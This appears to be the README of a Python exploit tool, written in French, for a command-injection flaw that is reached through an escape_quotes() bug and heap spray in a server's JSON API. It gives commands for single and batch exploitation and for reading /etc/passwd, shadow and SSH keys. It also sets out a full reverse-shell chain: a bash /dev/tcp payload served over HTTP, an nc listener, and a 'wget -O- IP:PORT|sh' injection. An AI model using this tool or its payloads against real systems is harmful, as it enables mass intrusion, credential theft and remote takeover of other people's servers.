
Comprend la détection de commandes exécutables et un getshell en un clic (nécessite le déploiement d'un service sur le serveur)
Inclut la détection des commandes exécutables et un one-click getShell (nécessite un service déployé sur le serveur)
pco.yaml peut être utilisé avec nuclei pour une détection rapide
python go.py
Entrez l'URL cible → sélectionnez la fonction dans le menu.
# Détection rapide (8 informations de base)
python go.py -t https://IP:PORT --probe fast
# Détection profonde (toutes les commandes : 30+ éléments)
python go.py -t https://IP:PORT --probe deep
# Détection par lot
python go.py -f vulnerable_targets.txt --probe fast
python go.py -t https://IP:PORT -c "hostname"
python go.py -t https://IP:PORT -c "ls -la /root"
python go.py -t https://IP:PORT -c "cat /etc/passwd"
# Par lot en concurrence (20 threads)
python go.py -f targets.txt -c "hostname" --batch 20
Ouvrez deux terminaux sur la machine d'attaque :
# Terminal 1 - Service HTTP (fournit rev.sh)
echo 'bash -i >& /dev/tcp/YOUR_IP/8088 0>&1' > index.html
python3 -m http.server 8087
# Terminal 2 - Attente du reverse
nc -lvnp 8088
Puis envoyez le payload :
# Cible unique
python go.py -t https://IP:PORT -l YOUR_IP -p 8087 -n 8088
# Par lot (série, un seul à la fois)
python go.py -f targets.txt -l YOUR_IP -p 8087 -n 8088
Le script imprime les étapes de préparation avant d'envoyer.
| Catégorie | Commande |
|---|---|
| Informations de base | hostname, uname -a, kernel, OS release, uptime |
| Utilisateurs | id, whoami, users/w/who |
| Réseau | ifconfig, route, arp, listening ports, connections, iptables |
| Système | processes, cpuinfo, meminfo, disk, mount |
| Fichiers | ls / /root /tmp /home /etc |
| Configuration | crontab, passwd, shadow, sudoers, SSH keys |
| Extension | config search, scripts, docker, containers |
{"cmd":"getall","apiuser":"''''","apipass":"BBBBB",
"g0":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'; <commande> #", ...}
apiuser="''''" déclenche le défaut de non-null-termination de escape_quotes()g0~g60 heap spray 61 fois, augmente le taux de réussite'; <commande> # ferme le contexte, # commente la suiteSans echo tag, 34 caractères disponibles :
wget -O- IP:PORT|sh (31 caractères)
Chaîne de pipe : wget télécharge → sh exécute → bash reverse vers le port spécifié.
| Paramètre | Rôle |
|---|---|
-t, --target URL | Adresse cible |
-f, --file FILE | Fichier de liste de cibles |
-l, --lhost IP | IP de la machine d'attaque |
-p, --lport PORT | Port du service HTTP (défaut 8087) |
-n, --ncport PORT | Port d'écoute nc (défaut 8088) |
-c, --cmd CMD | Commande à exécuter |
--probe fast/deep | Détection rapide/profonde |
--batch N | Nombre de cibles concurrentes (défaut série) |